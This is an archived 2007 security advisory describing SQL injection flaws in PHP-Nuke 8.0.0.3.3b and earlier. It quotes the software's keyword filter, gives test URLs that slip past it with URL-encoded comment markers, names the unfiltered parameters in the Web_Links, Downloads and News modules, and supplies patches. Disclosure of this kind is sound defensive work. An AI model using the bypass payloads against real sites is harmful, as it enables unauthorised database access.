Vulners
Lucene search
phpnuke-bypass-sql.txt
🗓️ 17 Apr 2007 00:00:00Reported by Aleksandar aka sale83Type 
packetstorm🔗 packetstormsecurity.com👁 27 Views
`PHP Nuke <= 8.0.0.3.3b SQL Injections and Bypass SQL Injection Protection vulnerabilities
________________________
PROGRAM: PHP-Nuke
HOMEPAGE: http://phpnuke.org/
VERSION: All version
BUG: PHP Nuke <= 8.0.0.3.3b Bypass SQL Injection Protection and SQL Injections vulnerabilities
AUTHOR: Aleksandar
________________________
Let's look at source code from mainfile.php line 435
__________________________________________
//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
if(isset($_SERVER['QUERY_STRING'])) {
if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /", rawurldecode($loc=$_SERVER['QUERY_STRING']), $matches)) {
die('Illegal Operation 1');
}
}
if(!isset($admin) OR (isset($admin) AND !is_admin($admin))) {
$queryString = $_SERVER['QUERY_STRING'];
if (($_SERVER['PHP_SELF'] != "/index.php") OR !isset($url))
{
if (stristr($queryString,'http://')) die('Illegal Operation 2');
}
if ((stristr($queryString,'%20union%20')) OR (stristr($queryString,'/*')) OR (stristr($queryString,'*/union/*')) OR (stristr($queryString,'c2nyaxb0')) OR (stristr($queryString,'+union+')) OR ((stristr($queryString,'cmd=')) AND (!stristr($queryString,'&cmd'))) OR ((stristr($queryString,'exec')) AND (!stristr($queryString,'execu'))) OR (stristr($queryString,'concat'))) {
die('Illegal Operation 3');
}
}__________________________________________
So we can se different filters. :)
Lets start whit a testing:
TEST 1
http://localhost/nuke/?/*
So we will se this message: Illegal Operation 3
TEST 2
http://localhost/nuke/?%2f*
Yeah - we got through :)
TEST 3
http://localhost/?%20UNION%20SELECT
Illegal Operation 1
TEST 4
http://localhost:8080/html80/?%2f**/UNION%2f**/SELECT ..
Yeah - we got through :)
PATCH:
__________________________________________
if ((stristr($queryString,'%20union%20')) OR (stristr($queryString,'*%2f*')) OR (stristr($queryString,'/*')) OR (stristr($queryString,'*/union/*')) OR (stristr($queryString,'c2nyaxb0')) OR (stristr($queryString,'+union+')) OR ((stristr($queryString,'cmd=')) AND (!stristr($queryString,'&cmd'))) OR ((stristr($queryString,'exec')) AND (!stristr($queryString,'execu'))) OR (stristr($queryString,'concat'))) {
die('Illegal Operation');
}
__________________________________________
Multiple SQL Injection vulnerability in Web_Links, News and Download module
+++++++++++++++++++++++++++
PHP.ini
Magic Quotes = OFF
Register Global = ON
+++++++++++++++++++++++++++
Now Let's look at source code from Web_Links/index.php:
Vulnerability function
function viewlinkcomments($lid) {
global $prefix, $db, $admin, $bgcolor2, $module_name, $admin_file;
include("header.php");
include("modules/$module_name/l_config.php");
menu(1);
$row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_links_links WHERE lid='$lid'")); // BUG ---> $lid
$ttitle = filter($row['title'], "nohtml");
$lid = intval(trim($lid)); //WTF?<===== lol ??????????????? :):):):):)
echo "<br>";
...
How to fix:
Add $lid = intval(trim($lid)); before $row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_links_links WHERE lid='$lid'"));
___________________________________________
function viewlinkcomments($lid) {
global $prefix, $db, $admin, $bgcolor2, $module_name, $admin_file;
include("header.php");
include("modules/$module_name/l_config.php");
menu(1);
$lid = intval(trim($lid)); // FIX
$row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_links_links WHERE lid='$lid'"));
$ttitle = filter($row['title'], "nohtml");
//$lid = intval(trim($lid)); // REMOVE THIS LINE !!!!!!!
echo "<br>";
...
__________________________________________________
Vulnerability Functions:
function viewlinkcomments($lid) {
function viewlinkeditorial($lid){
function viewlinkcomments($lid){
function ratelink($lid, $user) {
The "$lid" variable isn't filtered, so if we bypass the sql injection protection we can execute arbitrary sql commands.
SQL Injection vulnerability in Downloads
Vulnerability Functions:
function viewdownloadeditorial($lid) {
function viewdownloadcomments($lid) {
function ratedownload($lid, $user) {
The "$lid" variable isn't filtered , so if we bypass the sql injection protection we can execute arbitrary sql commands.
SQL Injection vulnerability in News
Vulnerability Function:
function rate_complete($sid, $rated=0, $score) {
The "$sid" variable isn't filtered , so if we bypass the sql injection protection we can execute arbitrary sql commands.
Best Regards
Aleksandar
Programmer and Web Developer
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Apr 2007 00:00Current
7.4High risk
Vulners AI Score7.4